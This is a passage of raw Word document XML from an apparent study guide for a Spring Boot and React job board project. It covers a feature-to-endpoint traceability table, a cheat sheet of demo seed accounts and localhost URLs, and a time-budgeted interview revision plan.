              </w:rPr>
              <w:t>GET /api/jobs/{id}/match</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JobController -&gt; CandidateProfileService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>profile_skills, job_skills</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Job Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>JobDetailsPage.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/jobs/{id}/apply</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ApplicationController -&gt; ApplicationService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>applications, notifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter Pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ApplicantTrackingPage.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT /api/recruiter/applications/{id}/status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>RecruiterController -&gt; ApplicationService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>applications, audit_logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Interview Dispatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ScheduleInterviewModal.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/interviews/schedule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>InterviewController -&gt; InterviewService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>interviews, notifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Offer Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ApplicantTrackingPage.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/offers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OfferController -&gt; OfferService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>offers, notifications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin Governance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AdminDashboardPage.jsx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT /api/admin/users/{id}/toggle-status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AdminController -&gt; UserService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>users, audit_logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>38. Master Project Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication Matrix: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Default Seed Credentials (Password for all accounts: Password@123):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Candidate (Backend): riya.backend / riya.sharma@example.com (ROLE_CANDIDATE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Candidate (Frontend): samir.react / samir.patel@example.com (ROLE_CANDIDATE)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Recruiter (Talent Lead): mira.recruiter / mira.recruiter@globalco.internal (ROLE_RECRUITER)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Recruiter (Tech): devon.tech / devon.recruiter@globalco.internal (ROLE_RECRUITER)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Platform Administrator: admin / admin@globalco.internal (ROLE_ADMIN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Key Local URLs &amp; Ports:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Frontend Application: http://localhost:5173</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Backend REST API Base: http://localhost:8080/api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Swagger / OpenAPI UI: http://localhost:8080/swagger-ui/index.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>H2 Database Console: http://localhost:8080/h2-console (JDBC URL: jdbc:h2:mem:jobboard_db, User: sa, Password: password)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>39. One-Day Before Interview Revision Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Use this high-yield, time-budgeted study guide to review the system based on available preparation time:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>39.1 Tiered Preparation Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Must Know: The 3-tier architecture, stateless JWT auth flow, Jaccard/overlap skill match formula, and 1-click apply duplicate prevention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Should Know: The 7-stage ATS pipeline state machine, @Transactional atomicity, JOIN FETCH to solve N+1 queries, and GlobalExceptionHandler envelopes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Good to Know: Scalability roadmap (Redis caching, Kafka event streaming, AWS RDS Aurora migration) and OWASP Top 10 security defenses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>39.2 Time-Budgeted Revision Schedules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4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Time Available</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>High-Yield Study Action Plan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>30-Minute Lightning Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1. Memorize 30-sec pitch and 2-min walkthrough (Section 31).</w:t>
              <w:br/>
              <w:t>2. Review Core Traceability Matrix (Section 37).</w:t>
              <w:br/>
              <w:t>3. Review Top 5 Flashcards (Section 39.3).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1-Hour Deep Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6768"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1. Complete 30-minute review items above.</w:t>
              <w:br/>
              <w:t>2. Review Database ERD and Entity Dictionary (Sections 12 &amp; 13).</w:t>
              <w:br/>
              <w:t>3. Review Top 15 Technical Q&amp;A Bank (Section 32).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
